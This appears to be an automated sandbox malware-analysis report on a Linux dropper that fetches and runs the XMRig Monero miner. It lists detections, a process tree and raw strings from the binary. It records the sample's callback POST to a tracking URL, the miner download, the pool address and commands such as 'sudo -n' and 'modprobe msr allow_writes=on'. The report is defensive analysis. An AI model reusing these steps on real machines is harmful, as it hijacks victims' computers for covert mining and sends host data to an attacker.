Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
xmr_linux_amd64 (2).elf

Overview

General Information

Sample name:	xmr_linux_amd64 (2).elf
Analysis ID:	1515162
MD5:	2352fd3e33ed079446cad48ee044df18
SHA1:	2c1802e6f3eb067984245b0c23d2f093a93a42cc
SHA256:	dbf22aada7e9efa11116411e1d6f18f6ecbb215d53e21d6f769e1869f4e8160b
Tags:	elfminerxmrxmrigxmr_linux_archuser-NaughtyMikoCorp
Infos:

Detection

Xmrig

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Yara detected Xmrig cryptocurrency miner

Found Tor onion address

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample reads /proc/mounts (often used for finding a writable filesystem)

Stdout / stderr contain strings indicative of a mining client

Tries to load the MSR kernel module used for reading/writing to CPUs model specific register

Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "modprobe" command used for loading kernel modules

Executes the "sudo" command used to execute a command as another user

May check the online IP address of the machine

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Suricata IDS alerts with low severity for network traffic

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

×

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1515162
Start date and time:	2024-09-21 21:25:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	xmr_linux_amd64 (2).elf
Detection:	MAL
Classification:	mal96.troj.evad.mine.linELF@0/6@59/0

Warnings

Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://crl.certigna.fr/certignarootca.crl01
VT rate limit hit for: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
VT rate limit hit for: http://policy.camerfirma.com0
VT rate limit hit for: http://www.accv.es00
VT rate limit hit for: http://www.cert.fnmt.es/dpcs/0
VT rate limit hit for: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz
VT rate limit hit for: https://ocsp.quovadisoffshore.com0

Runtime Messages

Command:	/tmp/xmr_linux_amd64 (2).elf
PID:	6258
Exit Code:
Exit Code Info:
Killed:	True
Standard Output:	Error sending data to server: Post "https://vmtracker.freechildporninthisserver.lol/postgresqlstore": dial tcp: lookup vmtracker.freechildporninthisserver.lol on 127.0.0.53:53: read udp 127.0.0.1:55203->127.0.0.53:53: i/o timeout XMRig PID: 6295
Standard Error:	2024/09/21 14:26:12 Downloading xmrig... 2024/09/21 14:26:21 Downloaded and extracted xmrig 2024/09/21 14:26:21 Patching json... 2024/09/21 14:26:22 Downloaded and configured config.json 2024/09/21 14:26:32 XMRig started 2024/09/21 14:26:32 * ABOUT XMRig/6.21.3 gcc/13.2.1 (built for Linux x86-64, 64 bit) 2024/09/21 14:26:32 * LIBS libuv/1.48.0 OpenSSL/3.0.13 hwloc/2.10.0 2024/09/21 14:26:32 * HUGE PAGES supported 2024/09/21 14:26:32 * 1GB PAGES supported 2024/09/21 14:26:32 * CPU Intel(R) Xeon(R) Silver 4210 CPU @ 2.20GHz (2) 64-bit AES VM 2024/09/21 14:26:32 L2:2.0 MB L3:27.5 MB 2C/2T NUMA:1 2024/09/21 14:26:32 * MEMORY 1.0/2.9 GB (33%) 2024/09/21 14:26:32 RAM slot #0: 2 GB DRAM @ 0 MHz RAM slot #0 2024/09/21 14:26:32 RAM slot #1: 1 GB DRAM @ 0 MHz RAM slot #1 2024/09/21 14:26:32 * MOTHERBOARD VMware, Inc. - VMware Virtual Platform 2024/09/21 14:26:32 * DONATE 1% 2024/09/21 14:26:32 * ASSEMBLY auto:intel 2024/09/21 14:26:32 * POOL #1 pool.supportxmr.com:443 algo rx/0 2024/09/21 14:26:32 * COMMANDS 'h' hashrate, 'p' pause, 'r' resume, 's' results, 'c' connection 2024/09/21 14:26:32 [2024-09-21 14:26:24.181] net use pool pool.supportxmr.com:443 TLSv1.3 141.94.96.71 2024/09/21 14:26:32 [2024-09-21 14:26:24.183] net fingerprint (SHA-256): "8b476d6409464a82d22c1d9df10503e79f2d0dcc8c7f722bdaaaf6e499ea8cf6" 2024/09/21 14:26:32 [2024-09-21 14:26:24.185] net new job from pool.supportxmr.com:443 diff 50000 algo rx/0 height 3242520 (8 tx) 2024/09/21 14:26:32 [2024-09-21 14:26:24.186] cpu use argon2 implementation AVX-512F 2024/09/21 14:26:32 [2024-09-21 14:26:24.188] msr this CPU doesn't support cat_l3, cache QoS is unavailable 2024/09/21 14:26:32 [2024-09-21 14:26:24.306] msr register values for "intel" preset have been set successfully (118 ms) 2024/09/21 14:26:32 [2024-09-21 14:26:24.307] randomx init dataset algo rx/0 (2 threads) seed 526577d6e6689ba8... 2024/09/21 14:26:32 [2024-09-21 14:26:24.634] randomx failed to allocate RandomX dataset using 1GB pages 2024/09/21 14:26:32 [2024-09-21 14:26:24.663] randomx allocated 2336 MB (2080+256) huge pages 11% 128/1168 +JIT (354 ms) 2024/09/21 14:26:32 [2024-09-21 14:26:31.325] net new job from pool.supportxmr.com:443 diff 50000 algo rx/0 height 3242520 (11 tx) 2024/09/21 14:26:38 [2024-09-21 14:26:38.228] randomx dataset ready (13563 ms) 2024/09/21 14:26:38 [2024-09-21 14:26:38.242] cpu use profile rx (2 threads) scratchpad 2048 KB 2024/09/21 14:26:38 [2024-09-21 14:26:38.247] cpu READY threads 2/2 (2) huge pages 100% 2/2 memory 4096 KB (2 ms) 2024/09/21 14:26:44 [2024-09-21 14:26:44.160] net new job from pool.supportxmr.com:443 diff 50000 algo rx/0 height 3242520 (15 tx)

Process Tree

system is lnxubuntu20

xmr_linux_amd64 (2).elf (PID: 6258, Parent: 6182, MD5: 2352fd3e33ed079446cad48ee044df18) Arguments: "/tmp/xmr_linux_amd64 (2).elf"

xmr_linux_amd64 (2).elf New Fork (PID: 6268, Parent: 6258)

sudo (PID: 6268, Parent: 6258, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n true

sudo New Fork (PID: 6269, Parent: 6268)

true (PID: 6269, Parent: 6268, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: true

xmr_linux_amd64 (2).elf New Fork (PID: 6294, Parent: 6258)

sudo (PID: 6294, Parent: 6258, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig

sudo New Fork (PID: 6295, Parent: 6294)

xmrig (PID: 6295, Parent: 6294, MD5: 7429d24207b100f6c164bf4703b5941e) Arguments: /tmp/xmrig/xmrig-6.21.3/xmrig

xmrig New Fork (PID: 6304, Parent: 6295)

sh (PID: 6304, Parent: 6295, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"

sh New Fork (PID: 6305, Parent: 6304)

modprobe (PID: 6305, Parent: 6304, MD5: 0b44462b1a40df8039d6d61cfff7ea84) Arguments: /sbin/modprobe msr allow_writes=on

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XMRIG		No Attribution	https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/tmp/xmrig/xmrig-6.21.3/config.json	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
/tmp/xmrig/xmrig-6.21.3/xmrig	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
/tmp/xmrig/xmrig-6.21.3/xmrig	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x209f98:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
/tmp/xmrig/xmrig-6.21.3/xmrig	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5cc6c7:$a1: mining.set_target 0x5cb909:$a2: XMRIG_HOSTNAME 0x5e5db8:$a3: Usage: xmrig [OPTIONS] 0x5cb8ea:$a4: XMRIG_VERSION

Memory Dumps

Source	Rule	Description	Author	Strings
6258.1.000000c000000000.000000c000800000.rw-.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: xmr_linux_amd64 (2).elf PID: 6258	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Suricata Signatures

ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-21T21:26:23.428329+0200	2047928	2	Crypto Currency Mining Activity Detected	192.168.2.23	35974	1.1.1.1	53	UDP
2024-09-21T21:26:23.428329+0200	2047928	2	Crypto Currency Mining Activity Detected	192.168.2.23	60473	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: /tmp/xmrig/xmrig-6.21.3/xmrig

Avira: detection malicious, Label: ANDROID/AVE.Miner.nezaa

Machine Learning detection for dropped file

Source: /tmp/xmrig/xmrig-6.21.3/xmrig

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: xmr_linux_amd64 (2).elf

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xmr_linux_amd64 (2).elf PID: 6258, type: MEMORYSTR
Source: Yara match	File source: /tmp/xmrig/xmrig-6.21.3/config.json, type: DROPPED
Source: Yara match	File source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPED

Found strings related to Crypto-Mining

Source: xmrig.12.dr	String found in binary or memory: stratum+ssl://%s
Source: xmrig.12.dr	String found in binary or memory: cryptonight/0
Source: xmrig.12.dr	String found in binary or memory: -o, --url=URL URL of mining server
Source: xmrig.12.dr	String found in binary or memory: stratum+tcp://
Source: xmrig.12.dr	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: sudo-n/tmp/xmrig/xmrig-6.21.3/xmrig 0

Stdout / stderr contain strings indicative of a mining client

Source: /tmp/xmr_linux_amd64 (2).elf	Stdout: xmrig
Source: /tmp/xmr_linux_amd64 (2).elf	Stderr: xmrig

Tries to load the MSR kernel module used for reading/writing to CPUs model specific register

Source: /bin/sh (PID: 6305)

Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on

Jump to behavior

Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)

Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	MSR open for writing: /dev/cpu/0/msr			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	MSR open for writing: /dev/cpu/1/msr			Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	Reads CPU info from proc file: /proc/cpuinfo			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from proc file: /proc/cpuinfo			Jump to behavior

Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/possible			Jump to behavior

Networking

Found Tor onion address

Source: xmr_linux_amd64 (2).elf	String found in binary or memory: cookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5-RSAserial:::ffff:TypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLanswers2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5amxtileamxint8amxbf16osxsave#intern
Source: xmr_linux_amd64 (2).elf	String found in binary or memory: bindunix.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2/sysrolevboxselfEDOMEADVcap -> failbitsTypeasn1cx16sse2xmrigcbashbash2amd64unamegnamemtimeatimectimeUSTARfalse<nil>Error&"'https:**@Rangerangeclose:path%s %q%s=%sHTTP/socksFoundchdirwritemkdir$HOMEchmodlinuxgetwdpipe2lstatdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingfault[...]MarchAprilmonthLocalarray1562578125AppleIntelPOWERint16int32int64uint8slice$USERtls: Earlyparsefilesimap2imap3imapspop3shosts.avif.html.jpeg.json.wasm.webputf-8%s%dtext/Realmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3/procbtimeguestVxID:CLOSEEPERMESRCHEINTRENXIOE2BIGEBADFEBUSYEXDEVEFBIGEROFSEPIPEELOOPEIDRMEBADEEBADRETIMEENOSRECOMMSIGIOmatchrune SHA-1P-224P-256P-384P-521ECDSA (at TypeAClassxmrig1helperpc784foraclea851eb/xmrigStringFormat[]bytestringClosedCANCELGOAWAYPADDEDactiveclosedsocks5Basic CookieacceptallowcookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup 